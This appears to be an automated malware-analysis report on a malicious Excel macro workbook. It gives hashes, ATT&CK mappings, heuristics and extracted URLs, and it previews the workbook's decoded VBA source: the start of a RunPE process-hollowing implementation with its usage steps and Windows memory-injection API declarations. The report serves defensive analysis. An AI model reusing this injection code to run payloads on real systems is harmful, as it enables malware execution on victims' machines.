Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 056ef0d5568a1e8f…

MALICIOUS

Office (OOXML)

57.4 KB Created: 2021-09-20 17:39:17 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-09-25
MD5: 88e51310c1c333f3d8c67da07181b1ff SHA-1: e42c8f767d32cce8362cce688cd7f5e6577eb827 SHA-256: 056ef0d5568a1e8f0f7c50aaec0f8cb04926a94878ffc2e1f9e60d759a8f005f
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains VBA macros that reference cmd.exe and PowerShell, indicating an attempt to execute arbitrary commands or scripts. The embedded VBA code explicitly mentions the 'RunPE' technique and includes references to GitHub repositories related to this technique, suggesting the macro is designed to download and execute a second-stage payload. The presence of these elements strongly points towards a malicious document designed for payload delivery.

Heuristics 4

  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://github.com/itm4n/VBA-RunPE In document text (OOXML body / shared strings)
    • https://github.com/hasherezade/In document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680305(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680313(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms680336(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_SECTION_HEADER.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms684873(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms686331(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/FLOATING_SAVE_AREA.htmlIn document text (OOXML body / shared strings)
    • https://msdn.microsoft.com/en-us/library/windows/desktop/ms679284(v=vs.85).aspxIn document text (OOXML body / shared strings)
    • https://www.nirsoft.net/kernel_struct/vista/IMAGE_DOS_HEADER.html�In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 53723 bytes
SHA-256: 2afb41fa8dbc0478b82810c719ff14e52ec7726f2b74484f85b7531a25f6c291
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' --------------------------------------------------------------------------------
' Title: VBA RunPE
' Filename: RunPE.vba
' GitHub: https://github.com/itm4n/VBA-RunPE
' Date: 2019-12-14
' Author: Clement Labro (@itm4n)
' Description: A RunPE implementation in VBA with Windows API calls. It is
'   compatible with both 32 bits and 64 bits versions of Microsoft Office.
'   The 32 bits version of Office can only run 32 bits executables and the 64 bits
'   version can only run 64 bits executables.
' Usage: 1. In the 'Exploit' procedure at the end of the code, set the path of the
'               file you want to execute (with optional arguments)
'        2. Enable View > Immediate Window (Ctrl + G) (to check execution and error
'               logs)
'        3. Run the macro!
' Tested on: - Windows 7 Pro 64 bits + Office 2016 32 bits
'            - Windows 10 Pro 64 bits + Office 2016 64 bits
' Credit: @hasherezade - https://github.com/hasherezade/ (RunPE written in C++
'   with dynamic relocations)
' --------------------------------------------------------------------------------

Option Explicit

' ================================================================================
'                      ~~~ IMPORT WINDOWS API FUNCTIONS ~~~
' ================================================================================
#If Win64 Then
    Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
    Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
    Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
    Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
    Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
    Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
    Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
    Private Declare PtrSafe Function ResumeThread
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 118784 bytes
SHA-256: 899baae0adbf6edbc14933f38c0d1f4744d9f760ea0818f661ef439cd7ac6aaa

Open this report in the interactive analyzer, or submit your own file for analysis.